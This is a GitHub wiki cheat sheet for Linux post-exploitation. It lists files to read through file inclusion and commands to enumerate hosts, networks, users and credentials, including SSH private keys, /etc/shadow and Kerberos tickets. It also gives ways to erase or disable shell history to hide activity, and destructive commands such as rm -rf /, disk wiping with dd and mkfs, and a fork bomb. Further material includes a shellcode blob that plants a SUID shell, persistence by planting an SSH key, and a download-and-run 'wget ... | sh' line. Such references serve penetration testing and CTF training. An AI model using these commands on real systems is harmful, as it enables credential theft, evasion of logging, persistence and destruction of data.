post exploit linux - dvanmosselbeen/security-cheat-sheet GitHub Wiki
Things to pull when all you can do is blindly read like in LFI/dir traversal (Linux File Inclusion) (Don’t forget %00!)
A nice training room for this can be the TryHackMe Inclusion room https://tryhackme.com/room/inclusion
| File | Contents and Reason |
|---|---|
/etc/resolv.conf |
Contains the current name servers (DNS) for the system. This is a globally readable file that is less likely to trigger IDS alerts than /etc/passwd
|
/etc/motd |
Message of the Day |
/etc/issue |
current version of distro |
/etc/passwd |
List of local users |
/etc/shadow |
List of users’ passwords’ hashes (requires root) |
/home/xxx/.bash_history |
Will give you some directory context |
| Command | Description and/or Reason |
|---|---|
uname -a |
Prints the kernel version, arch, sometimes distro |
ps aux |
List all running processes |
top -n 1 -d |
Print process, 1 is a number of lines |
id |
Your current username, groups |
arch, uname -m
|
Kernel processor architecture |
w |
who is connected, uptime and load avg |
who -a |
uptime, runlevel, tty, proceses etc. |
df -k |
mounted fs, size, % use, dev and mount point |
mount |
mounted fs |
last -a |
Last users logged on. |
lastb |
Require admin rights. |
lastcomm |
Not installed by default - GNU Accounting utilities for process and login accounting |
lastlog |
Show who last logged in. |
lastlogin |
On BSD systems |
getenforce |
Get the status of SELinux (Enforcing, Permissive or Disabled) |
dmesg |
Informations from the last system boot |
lspci |
prints all PCI buses and devices |
lsusb |
prints all USB buses and devices |
lscpu |
prints CPU information |
lshw |
list hardware information |
cat /proc/cpuinfo |
|
cat /proc/meminfo |
|
du -h --max-depth=1 / |
note: can cause heavy disk i/o |
which nmap |
locate a command (ie nmap or nc) |
locate bin/nmap |
|
locate bin/nc |
|
jps -l |
| Command | Description and/or Reason |
|---|---|
hostname -f |
ong host name (FQDN) |
ip addr |
Show IP information |
ip route |
Show IP route |
ifconfig -a |
|
route -n |
Show IP route |
cat /etc/network/interfaces |
|
iptables -L -n -v |
|
iptables -t nat -L -n -v |
|
ip6tables -L -n -v |
|
iptables-save |
|
netstat -anop |
|
netstat -r |
|
netstat -nltupw |
root with raw sockets |
ss -tulpn |
|
arp -a |
Show arp table with IP info |
lsof -nPi |
|
cat /proc/net/* |
More discreet, all the information given by the above commands can be found by looking into the files under /proc/net, and this approach is less likely to trigger monitoring or other stuff |
| Command | Description and/or Reason |
|---|---|
cat /etc/passwd |
local accounts |
cat /etc/shadow |
password hashes on Linux |
/etc/security/passwd |
password hashes on AIX |
cat /etc/group |
groups (or /etc/gshadow) |
getent passwd |
should dump all local, LDAP, NIS, whatever the system is using |
getent group |
same for groups |
pdbedit -L -w |
Samba’s own database |
pdbedit -L -v |
|
cat /etc/aliases |
mail aliases |
find /etc -name aliases |
|
getent aliases |
|
ypcat passwd |
displays NIS password file |
| Command | Description and/or Reason |
|---|---|
ls -alh /home/*/ |
|
ls -alh /home/*/.ssh/ |
SSH files, hopefully finding private keys |
cat /home/*/.ssh/authorized_keys |
SSH Authorization keys |
cat /home/*/.ssh/known_hosts |
SSH know host files |
cat /home/\*/.*hist* |
Bash history files, you can learn a lot from this |
grep ^ssh /home/*/.*hist* |
|
grep ^telnet /home/*/.*hist* |
|
grep ^mysql /home/*/.*hist* |
|
find /home/\*/.vnc /home/\*/.subversion -type f |
|
cat /home/*/.viminfo |
|
sudo -l |
if sudoers is not. readable, this sometimes works per user |
crontab -l |
|
getcap -r / 2>/dev/null |
Shows the user capabilities. What the user is able to do. Is not enabled on all systems, like the kali box. see man capabilities. |
cat /home/*/.mysql_history |
|
sudo -p |
Allows the user to define what the password prompt will be, useful for fun customization with aliases or shell scripts |
| File/Folder | Description and/or Reason |
|---|---|
/home/\*/.ssh/id* |
SSH keys, often passwordless |
/tmp/krb5cc_* |
Kerberos tickets |
/tmp/krb5.keytab |
Kerberos tickets |
/home/*/.gnupg/secring.gpgs |
PGP keys |
| File/Folder | Description and/or Reason |
|---|---|
ls -aRl /etc/ * awk '$1 ~ /w.$/' * grep -v lrwx 2>/dev/nullte |
|
cat /etc/issue{,.net} |
|
cat /etc/master.passwd |
|
cat /etc/group |
|
cat /etc/hosts |
|
cat /etc/crontab |
|
cat /etc/sysctl.conf |
|
for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done |
Lists all crons |
cat /etc/resolv.conf |
|
cat /etc/syslog.conf |
|
cat /etc/chttp.conf |
|
cat /etc/lighttpd.conf |
|
cat /etc/cups/cupsd.confcda |
|
cat /etc/inetd.conf |
|
cat /opt/lampp/etc/httpd.conf |
|
cat /etc/samba/smb.conf |
|
cat /etc/openldap/ldap.conf |
|
cat /etc/ldap/ldap.conf |
|
cat /etc/exports |
|
cat /etc/auto.master |
|
cat /etc/auto_master |
|
cat /etc/fstab |
|
find /etc/sysconfig/ -type f -exec cat {} \; |
| File | Description and/or Reason |
|---|---|
uname -a |
often hints at it pretty well |
lsb_release -d |
Generic command for all LSB distros |
/etc/os-release |
Generic for distros using “systemd” |
/etc/issue |
Generic but often modified |
cat /etc/*release |
|
/etc/SUSE-release |
Novell SUSE |
/etc/redhat-release, /etc/redhat_version |
Red Hat |
/etc/fedora-release |
Fedora |
/etc/slackware-release, /etc/slackware-version |
Slackware |
/etc/debian_release, /etc/debian_version |
Debian |
/etc/mandrake-release |
Mandrake |
/etc/sun-release |
Sun JDS |
/etc/release |
Solaris/Sparc |
/etc/gentoo-release |
Gentoo |
/etc/arch-release |
Arch Linux (file will be empty) |
arch |
OpenBSD; sample: “OpenBSD.amd64” |
| Command | Description and/or Reason |
|---|---|
rpm -qa --last |
head |
yum list |
grep installed |
dpkg -l |
Debian |
dpkg --get-selections |
Debian |
pkg_info |
{Free,Net}BSD |
pkginfo |
Solaris |
cd /var/db/pkg/ && ls -d */* |
Gentoo |
pacman -Q |
Arch Linux |
| Command | Description and/or Reason |
|---|---|
cat /etc/apt/sources.list |
Debian |
ls -l /etc/yum.repos.d/ |
|
cat /etc/yum.conf |
| Command | Description and/or Reason |
|---|---|
grep -rnw '/path/to/somewhere/' -e 'some-word-you-search' |
Search for some-word-you-search. |
ls -dlR */ |
|
find /var -type d |
|
find /var ! -user root -type d -ls |
|
find /var/log -type f -exec ls -la {} \; |
|
find / -perm -u=s -type f 2>/dev/null |
Find all SUID files |
find / -perm +6000 2>/dev/null |
Find all SUID files |
find / -perm -4000 |
Find all suid files. |
find / -user root -perm /4000 |
Find all suid files. |
ls -alhtr /mnt |
Find all suid files. |
ls -alhtr /media |
Find all suid files. |
ls -alhtr /tmp |
Find all suid files. |
ls -alhtr /home |
Find all suid files. |
cd /home/; treels /home/*/.ssh/* |
|
find /home -type f -iname '.*history' |
|
ls -lart /etc/rc.d/ |
|
ls /home/\*/id* |
|
locate rhosts |
Other commands bellow I could not put into this Markdown table due the syntax. Arf, Markdown syntax has its limits.
| -----------------------------------------------------------------------------|
| COMMAND | Description and/or Reason |
| -----------------------------------------------------------------------------|
ls -alR | grep ^d
ls -dl \`find /var -type d\`
ls -dl \`find /var -type d\` | grep -v root
### Remember to updatedb before running locate
locate tar | grep [.]tar$
locate tgz | grep [.]tgz$
locate sql | grep [.]sql$
locate settings | grep [.]php$
locate config.inc | grep [.]php$
### java config files
.properties | grep [.]properties
### java/.net config files
locate .xml | grep [.]xml
### find suids
find /sbin /usr/sbin /opt /lib \`echo $PATH | ‘sed s/:/ /g’\` -perm /6000 -ls
Also, check http://incolumitas.com/uploads/2012/12/blackhats_view.pdf for some one-liners that find world writable directories/files and more.
| Command | Description and/or Reason |
|---|---|
sort |
Sort a text file. |
export HISTFILE=unset HISTFILE- Using a space in front of your commands avoid these being recorded in the
bashhistory.
This next one might not be a good idea, because a lot of folks know to check for tampering with this file, and will be suspicious if they find out.
However, if you happen to be on an account that was originally inaccessible, if the .bash_history file is available (ls -a ~), viewcating its contents can provide you with a good deal of information about the system and its most recent updates/changes.
| File | Description and/or Reason |
|---|---|
history -c |
clear all history in ram |
rm -rf ~/.bash_history && ln -s ~/.bash_history /dev/null |
Invasive |
touch ~/.bash_history |
Invasive |
<space> history -c |
Using a space before a command |
zsh% unset HISTFILE HISTSIZE |
|
tcsh% set history=0 |
|
bash$ set +o history |
|
ksh$ unset HISTFILE |
|
find / -type f -exec {} |
Forensics nightmare |
Note that you’re probably better off modifying or temporary disabling rather than deleting history files, it leaves a lot less traces and is less suspect.
In some cases HISTFILE and HISTFILESIZE are made read-only; get around this by explicitly clearing history (history -c) or by kill -9 $$’ing the shell. Sometimes the shell can be configured to run ‘history -w’ after every command; get around this by overriding ‘history’ with a no-op shell function. None of this will help if the shell is configured to log everything to syslog, however.
Do not tell me you ar that kind of bitch!
If it is necessary to leave the machine inaccessible or unusable. Note that this tends to be quite evident (as opposed to a simple exploitation that might go unnoticed for some time, even forever), and will most surely get you into troubles.
Oh, and you’re probably a jerk if you use any of the stuff below.
| File | Description and/or Reason |
|---|---|
rm -rf / |
This will recursively try to delete all files |
mkfs.ext3 /dev/sda |
Reformat the device mentioned, making recovery of files hard |
dd if=/dev/zero of=/dev/sda bs=1M |
Overwrite disk /dev/sda with zeros |
- Hex version of
rm -rf /(How is this supposed to work?)
char esp[] \_\_attribute\_\_ ((section(”.text”))) /* e.s.p release */ = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68\"
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99\"
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7\"
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
“\x6e\x2f\x73\x68\x00\x2d\x63\x00"
“cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”;
- Fork Bomb: The [in]famous "fork bomb". This command will cause your system to run a large number of processes, until it "hangs". This can often lead to data loss (e.g. if the user brutally reboots, or the OOM killer kills a process with unsaved work). If left alone for enough time a system can eventually recover from a fork bomb. Read more here: https://en.wikipedia.org/wiki/Fork_bomb
:(){ :|:& };:
See the great linPEAS tool!: https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
| File | Description and/or Reason |
|---|---|
sudo -l |
Looking what current user is allowed to run as root user. See also GTFOBins. |
ls -alh /root/ |
|
cat /etc/sudoers |
|
cat /etc/shadow |
|
cat /etc/master.passwd # OpenBSD |
|
cat /var/spool/cron/crontabs/* |
|
cat /var/spool/cron/* |
|
lsof -nPi |
|
ls /home/\*/.ssh/*: |
|
cat /etc/crontab |
Looking for cronjobs. |
find / -user root -perm -4000 -print 2>/dev/null |
Also by creating a user account can be interesting.
To make things even better, you should always try and get shell access to the box. Ideally with an SSH connection to have full shell access instead of not so stable or limited reverse or bind shells.
id_rsa file that contains a private key that can be used to connect to a box via ssh. It is usually located in the .ssh folder in the user's home folder. (Full path: /home/USER/.ssh/id_rsa). Get that file on your system and give it read/write-only permissions for your user, (chmod 600 id_rsa) and connect from the host machine by executing ssh -i id_rsa USER@IP.
In case if the target box does not have a generated id_rsa file (or you simply don't have reading permissions for it), you can still gain stable ssh access. All you need to do is generate your own id_rsa key on your system and include an associated key into authorized_keys file on the target machine.
Execute ssh-keygen and you should see id_rsa and id_rsa.pub files appear in your own .ssh folder. Copy the content of the id_rsa.pub file and put it inside the authorized_keys file on the target machine (located in .ssh folder). If the authorized_keys does not exist on the target machine, create it and chmod 600 authorized_keys. After that, connect to the machine using your id_rsa file with ssh -i id_rsa USER@IP and you won't be asked for a password. Note that this way you leave a trace of yourself.
NOTE: If the target machine does not have ssh config files at all. Just make them like previously mentioned.
NOTE: The ssh server also needs to allow this all.
See the dedicated document: Reverse Shell
wget http://server/file.sh -O- | sh
This command forces the download of a file and immediately its execution
-
GTFObins -
GTFOBinsis a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.